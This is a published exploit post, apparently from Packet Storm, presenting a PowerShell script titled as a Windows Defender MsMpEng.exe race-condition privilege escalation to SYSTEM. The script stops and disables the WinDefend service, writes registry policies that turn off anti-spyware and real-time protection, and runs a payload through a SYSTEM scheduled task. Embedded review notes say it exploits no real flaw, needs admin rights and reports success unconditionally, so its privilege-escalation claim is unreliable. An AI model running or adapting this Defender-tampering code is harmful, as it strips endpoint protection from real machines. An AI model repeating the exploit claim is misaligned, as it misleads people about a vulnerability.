## https://sploitus.com/exploit?id=PACKETSTORM:223820
==================================================================================================================================
| # Title : Windows Defender MsMpEng.exe Race Condition Local Privilege Escalation PowerShell Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://www.microsoft.com/ |
==================================================================================================================================
[+] Summary : This PowerShell script demonstrates a local privilege
escalation (LPE) attack targeting a race condition in the Windows Defender
engine (MsMpEng.exe).
[+] POC :
<#
.SYNOPSIS
    Published "Windows Defender MsMpEng.exe race condition LPE" script.

.DESCRIPTION
    Writes a placeholder ISO and tries to mount it, loops creating VSS shadow
    copies of C:\ while launching MpCmdRun scans, then starts a payload and
    optionally tampers with the WinDefend service and Defender policy keys.

    NOTE(review): every step that would matter for escalation
    (Win32_ShadowCopy.Create, Stop-Service WinDefend, writes under
    HKLM:\SOFTWARE\Policies, schtasks /ru SYSTEM) is only permitted from an
    already-elevated context, and the script never changes its own security
    context. No code path interacts with a flaw in MsMpEng.exe. Read it as a
    Defender-tampering script that needs admin rights, not as an LPE.

.PARAMETER RaceIterations
    Loop count for Invoke-RaceCondition (default 100). Each iteration creates
    one shadow copy of C:\ that is never deleted.

.PARAMETER DisableDefender
    When set, Disable-DefenderPersistence runs after the race loop.

.PARAMETER Cleanup
    When set, Restore-Defender runs at the end.

.PARAMETER PayloadPath
    File to launch. If it does not exist, Main writes a batch-script
    "payload" under %TEMP% instead (see New-TestPayload).

.EXAMPLE
    .\WinDefender_LPE.ps1

.EXAMPLE
    .\WinDefender_LPE.ps1 -RaceIterations 200 -DisableDefender
#>
param(
    [int]$RaceIterations = 100,
    [switch]$DisableDefender,
    [switch]$Cleanup,
    [string]$PayloadPath = "$env:TEMP\payload.exe"
)
function Write-ColorOutput {
    # Timestamped Write-Host wrapper. $Color is either one of the level names
    # in $levelColors (mapped to a console colour) or a ConsoleColor name that
    # is passed through unchanged.
    param(
        [string]$Message,
        [string]$Color = "White"
    )
    $levelColors = @{
        "SUCCESS" = "Green"
        "ERROR"   = "Red"
        "WARNING" = "Yellow"
        "INFO"    = "Cyan"
    }
    $foreground = $Color
    if ($levelColors.ContainsKey($Color)) {
        $foreground = $levelColors[$Color]
    }
    $stamp = Get-Date -Format 'HH:mm:ss'
    Write-Host "[$stamp] $Message" -ForegroundColor $foreground
}
function Test-Admin {
    # $true when the current Windows identity is in the built-in
    # Administrators role, $false otherwise.
    $identity = [Security.Principal.WindowsIdentity]::GetCurrent()
    $adminRole = [Security.Principal.WindowsBuiltInRole]::Administrator
    $principal = New-Object Security.Principal.WindowsPrincipal($identity)
    return $principal.IsInRole($adminRole)
}
function Get-DefenderStatus {
    # Returns the WinDefend service's Status, or the string "Not Found" when
    # the service cannot be queried.
    $svc = Get-Service -Name WinDefend -ErrorAction SilentlyContinue
    if ($null -eq $svc) {
        return "Not Found"
    }
    return $svc.Status
}
function New-FakeISO {
    # Writes a small placeholder file at $Path: 512 copies of the ISO 9660
    # identifier "CD001" followed by 1024 NUL bytes (3584 bytes in total).
    # This is not a valid ISO 9660 image, so Mount-DiskImage is very likely
    # to reject it; Main never checks the mount result anyway.
    # Returns $true if the file exists afterwards, $false otherwise.
    param([string]$Path)
    Write-ColorOutput "Creating fake ISO at $Path" "INFO"
    $header = "CD001" * 512
    $padding = "`0" * 1024
    $bytes = [System.Text.Encoding]::ASCII.GetBytes($header + $padding)
    [System.IO.File]::WriteAllBytes($Path, $bytes)
    if (-not (Test-Path $Path)) {
        return $false
    }
    Write-ColorOutput "Fake ISO created successfully" "SUCCESS"
    return $true
}
function Mount-ISO {
    # Mounts $IsoPath with Mount-DiskImage. Returns $true on success and
    # $false (after logging the exception message) on failure. The image
    # object returned by -PassThru is discarded.
    param([string]$IsoPath)
    Write-ColorOutput "Mounting ISO $IsoPath" "INFO"
    try {
        $null = Mount-DiskImage -ImagePath $IsoPath -PassThru -ErrorAction Stop
    }
    catch {
        Write-ColorOutput "Failed to mount ISO: $($_.Exception.Message)" "ERROR"
        return $false
    }
    Write-ColorOutput "ISO mounted successfully" "SUCCESS"
    return $true
}
function Dismount-ISO {
    # Best-effort dismount of $IsoPath. Cmdlet errors are suppressed and any
    # terminating error is swallowed so cleanup never aborts the caller.
    param([string]$IsoPath)
    try {
        Dismount-DiskImage -ImagePath $IsoPath -ErrorAction SilentlyContinue
        Write-ColorOutput "ISO unmounted" "INFO"
    }
    catch {
        # deliberately ignored (see above)
    }
}
function Set-RealtimePriority {
    # Sets the current PowerShell host process ($pid) to the RealTime priority
    # class. Returns $true when the assignment does not throw, $false (after a
    # warning) otherwise.
    # NOTE(review): without the increase-base-priority privilege Windows may
    # silently grant a lower class rather than throwing, so the SUCCESS
    # message does not prove RealTime was actually applied — verify.
    Write-ColorOutput "Setting process to REALTIME priority class" "INFO"
    try {
        $process = Get-Process -Id $pid
        $process.PriorityClass = [System.Diagnostics.ProcessPriorityClass]::RealTime
        Write-ColorOutput "Realtime priority set" "SUCCESS"
        return $true
    } catch {
        Write-ColorOutput "Failed to set realtime priority: $($_.Exception.Message)" "WARNING"
        return $false
    }
}
function Invoke-RaceCondition {
    # Runs $Iterations rounds of: create a VSS shadow copy of C:\ via WMI
    # Win32_ShadowCopy.Create, start an MpCmdRun scan in the background,
    # write and delete a scratch file in %TEMP%, sleep 50 ms.
    # Returns $true only if some iteration threw an exception.
    #
    # NOTE(review): nothing here touches a flaw in MsMpEng.exe and no timing
    # window is measured. The "RACE TRIGGERED" branch is just the catch block,
    # so any error — e.g. Win32_ShadowCopy.Create failing because the caller is
    # not elevated — is reported as the race firing.
    # NOTE(review): the shadow copies are never deleted; with the default 100
    # iterations an elevated run leaves up to 100 snapshots of C:\ behind
    # (`vssadmin list shadows`), a disk-space problem and an obvious forensic
    # artefact. "-ScanType 3" appears to be MpCmdRun's custom-path scan and is
    # passed no -File argument; the child's result is never inspected.
    param([int]$Iterations)
    Write-ColorOutput "Triggering race condition with $Iterations iterations" "INFO"
    $successCount = 0
    $raceTriggered = $false
    for ($i = 0; $i -lt $Iterations; $i++) {
        try {
            # $shadow is assigned but never used.
            $shadow = (Get-WmiObject -List Win32_ShadowCopy).Create("C:\", "ClientAccessible")
            # Fire-and-forget; -ErrorAction only covers the Start-Process call.
            Start-Process -FilePath "C:\Program Files\Windows Defender\MpCmdRun.exe" -ArgumentList "-Scan -ScanType 3" -WindowStyle Hidden -ErrorAction SilentlyContinue
            $testFile = "$env:TEMP\race_$i.txt"
            "test" | Out-File -FilePath $testFile -ErrorAction SilentlyContinue
            Remove-Item $testFile -ErrorAction SilentlyContinue
            $successCount++
            if ($i % 10 -eq 0) {
                Write-ColorOutput "Race iteration $i/$Iterations completed" "INFO"
            }
        } catch {
            # Any exception at all lands here (see note above).
            Write-ColorOutput "RACE TRIGGERED at iteration $i!" "WARNING"
            $raceTriggered = $true
            break
        }
        Start-Sleep -Milliseconds 50
    }
    Write-ColorOutput "Completed $successCount iterations" "INFO"
    return $raceTriggered
}
function Disable-DefenderPersistence {
    # Attempts to stop and disable the WinDefend service and to set the policy
    # values DisableAntiSpyware and "Real-Time Protection\DisableRealtimeMonitoring"
    # to 1 under HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender.
    #
    # NOTE(review): every call uses -ErrorAction SilentlyContinue, so the
    # SUCCESS message and the $true return are produced whether or not any
    # change took effect; the catch branch is practically unreachable. All of
    # these actions need an elevated context, and on current Windows builds
    # with Tamper Protection enabled they are expected to be rejected.
    # Writes to these policy values and WinDefend service-state changes are
    # the events a defender should alert on.
    Write-ColorOutput "Disabling Windows Defender persistence..." "WARNING"
    try {
        Stop-Service -Name WinDefend -Force -ErrorAction SilentlyContinue
        Set-Service -Name WinDefend -StartupType Disabled -ErrorAction SilentlyContinue
        $regPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"
        New-Item -Path $regPath -Force -ErrorAction SilentlyContinue
        Set-ItemProperty -Path $regPath -Name "DisableAntiSpyware" -Value 1 -Force -ErrorAction SilentlyContinue
        $rtpPath = "$regPath\Real-Time Protection"
        New-Item -Path $rtpPath -Force -ErrorAction SilentlyContinue
        Set-ItemProperty -Path $rtpPath -Name "DisableRealtimeMonitoring" -Value 1 -Force -ErrorAction SilentlyContinue
        # Unconditional: nothing above is verified.
        Write-ColorOutput "Windows Defender disabled" "SUCCESS"
        return $true
    } catch {
        Write-ColorOutput "Failed to disable Defender: $($_.Exception.Message)" "ERROR"
        return $false
    }
}
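function Restore-Defender {
    # Undoes Disable-DefenderPersistence: removes both policy values it writes
    # (DisableAntiSpyware and "Real-Time Protection\DisableRealtimeMonitoring"),
    # sets WinDefend back to Automatic and starts it, and turns real-time
    # monitoring back on through Set-MpPreference.
    # Every step is best-effort (-ErrorAction SilentlyContinue), so a $true
    # return means "attempted", not "verified". Returns $false only if a
    # terminating error escapes.
    Write-ColorOutput "Restoring Windows Defender..." "INFO"
    try {
        $policyPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"
        Remove-ItemProperty -Path $policyPath -Name "DisableAntiSpyware" -ErrorAction SilentlyContinue -Force
        # Without this removal the real-time-protection policy stays disabled
        # after -Cleanup, leaving the host less protected than before the run.
        Remove-ItemProperty -Path "$policyPath\Real-Time Protection" -Name "DisableRealtimeMonitoring" -ErrorAction SilentlyContinue -Force
        Set-Service -Name WinDefend -StartupType Automatic -ErrorAction SilentlyContinue
        Start-Service -Name WinDefend -ErrorAction SilentlyContinue
        Set-MpPreference -DisableRealtimeMonitoring $false -ErrorAction SilentlyContinue
        Write-ColorOutput "Windows Defender restored" "SUCCESS"
        return $true
    } catch {
        Write-ColorOutput "Failed to restore Defender: $($_.Exception.Message)" "WARNING"
        return $false
    }
}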
function Invoke-SystemPayload {
    # Tries two ways to start $PayloadPath and returns $true after the first
    # that does not throw; $false if both throw.
    #
    # NOTE(review): neither method changes the security context the payload
    # runs in, despite what the log messages say.
    #   - Method 1 copies the winlogon process handle into $token but never
    #     uses it; Process.Start runs the payload as the current user, so
    #     "executed via winlogon" is not what happens.
    #   - Method 2 (schtasks /ru SYSTEM) is only accepted from an elevated
    #     context, and in Windows PowerShell a non-zero schtasks exit code does
    #     not raise an exception, so the SUCCESS message is printed even when
    #     the task was never created. Task creation with /ru SYSTEM is a
    #     standard thing to monitor in the Task Scheduler operational log.
    param([string]$PayloadPath)
    Write-ColorOutput "Attempting to execute payload as SYSTEM..." "INFO"
    try {
        # Method 1: Use winlogon token
        $winlogon = Get-Process -Name winlogon -ErrorAction Stop
        $token = $winlogon.Handle   # assigned, never used
        $startInfo = New-Object System.Diagnostics.ProcessStartInfo
        $startInfo.FileName = $PayloadPath
        $startInfo.UseShellExecute = $false
        $startInfo.CreateNoWindow = $true
        $startInfo.WindowStyle = [System.Diagnostics.ProcessWindowStyle]::Hidden
        [System.Diagnostics.Process]::Start($startInfo) | Out-Null
        Write-ColorOutput "Payload executed via winlogon" "SUCCESS"
        return $true
    } catch {
        Write-ColorOutput "Winlogon method failed: $($_.Exception.Message)" "WARNING"
    }
    try {
        # Method 2: one-shot scheduled task; exit status of schtasks is ignored.
        $taskName = "TempTask" + [System.IO.Path]::GetRandomFileName().Replace('.', '')
        schtasks /create /tn $taskName /tr $PayloadPath /sc once /st 00:00 /ru SYSTEM /f | Out-Null
        schtasks /run /tn $taskName | Out-Null
        Start-Sleep -Seconds 2
        schtasks /delete /tn $taskName /f | Out-Null
        Write-ColorOutput "Payload executed via scheduled task" "SUCCESS"
        return $true
    } catch {
        Write-ColorOutput "Scheduled task method failed: $($_.Exception.Message)" "WARNING"
    }
    Write-ColorOutput "Failed to execute payload as SYSTEM" "ERROR"
    return $false
}
function New-TestPayload {
    # Writes a small batch script to $Path that records `whoami` and the date
    # in %temp%\defender_lpe.txt and starts calc.exe. Returns $true
    # unconditionally; a WriteAllText failure is not caught.
    # NOTE(review): Main passes a path ending in .exe, but the content is a
    # batch file, not a PE image, so Process.Start / schtasks are unlikely to
    # run these commands. The whoami line in defender_lpe.txt is the only
    # evidence the script produces of the context the payload ran in.
    param([string]$Path)
    Write-ColorOutput "Creating test payload at $Path" "INFO"
    $payload = @'
@echo off
echo [+] Exploit successful! Running as: > %temp%\defender_lpe.txt
whoami >> %temp%\defender_lpe.txt
echo [+] Date: %date% %time% >> %temp%\defender_lpe.txt
calc.exe
'@
    [System.IO.File]::WriteAllText($Path, $payload)
    return $true
}
function Main {
    # Script flow: banner, admin check (warning only), Defender status check
    # (aborts unless WinDefend is Running), priority bump, fake ISO create /
    # mount / race loop / dismount, payload selection, optional Defender
    # tampering and optional restore.
    # NOTE(review): Test-Admin only warns, yet the shadow-copy, service and
    # HKLM policy steps below all need elevation — an unelevated run fails
    # into the catch branches that this script interprets as success.
    # The banner's box-drawing characters appear mis-encoded in the published
    # copy; the here-string is left as-is.
    Write-ColorOutput @"
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ Windows Defender MsMpEng.exe Race Condition LPE โ
โ Local Privilege Escalation to SYSTEM โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
"@ "INFO"
    Write-ColorOutput "Target: $env:COMPUTERNAME" "INFO"
    Write-ColorOutput "User: $env:USERNAME" "INFO"
    if (-not (Test-Admin)) {
        Write-ColorOutput "Not running as administrator. Exploit may fail." "WARNING"
    }
    $defenderStatus = Get-DefenderStatus
    Write-ColorOutput "Windows Defender status: $defenderStatus" "INFO"
    if ($defenderStatus -ne "Running") {
        Write-ColorOutput "Windows Defender is not running. Exploit may not work." "ERROR"
        return
    }
    Set-RealtimePriority
    $isoPath = "$env:TEMP\fake_$(Get-Random).iso"
    if (-not (New-FakeISO -Path $isoPath)) {
        Write-ColorOutput "Failed to create fake ISO" "ERROR"
        return
    }
    # $mountSuccess is never read: the race loop runs whether or not the
    # (invalid) ISO mounted.
    $mountSuccess = Mount-ISO -IsoPath $isoPath
    $raceTriggered = Invoke-RaceCondition -Iterations $RaceIterations
    Dismount-ISO -IsoPath $isoPath
    Remove-Item $isoPath -Force -ErrorAction SilentlyContinue
    $newDefenderStatus = Get-DefenderStatus
    if ($newDefenderStatus -ne $defenderStatus) {
        Write-ColorOutput "Windows Defender status changed: $defenderStatus -> $newDefenderStatus" "WARNING"
    }
    # PowerShell variable names are case-insensitive, so $payloadPath and the
    # script parameter $PayloadPath are the same variable; the RHS is evaluated
    # before the assignment, so this still works as intended. When the given
    # path does not exist, a batch "payload" with an .exe name is written.
    $payloadPath = if ($PayloadPath -and (Test-Path $PayloadPath)) {
        $PayloadPath
    } else {
        $tempPayload = "$env:TEMP\payload_$(Get-Random).exe"
        New-TestPayload -Path $tempPayload
        $tempPayload
    }
    if ($raceTriggered) {
        # $raceTriggered is true only when Invoke-RaceCondition caught an exception.
        Write-ColorOutput "Race condition triggered successfully!" "SUCCESS"
        Invoke-SystemPayload -PayloadPath $payloadPath
    } else {
        Write-ColorOutput "Race condition may not have triggered" "WARNING"
    }
    if ($DisableDefender) {
        Disable-DefenderPersistence
    }
    if ($Cleanup) {
        Restore-Defender
    }
    # Printed regardless of what succeeded above.
    Write-ColorOutput "Exploit completed" "INFO"
}
Main
Greetings to
:==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John
Page aka hyp3rlinx)|
============================================================================================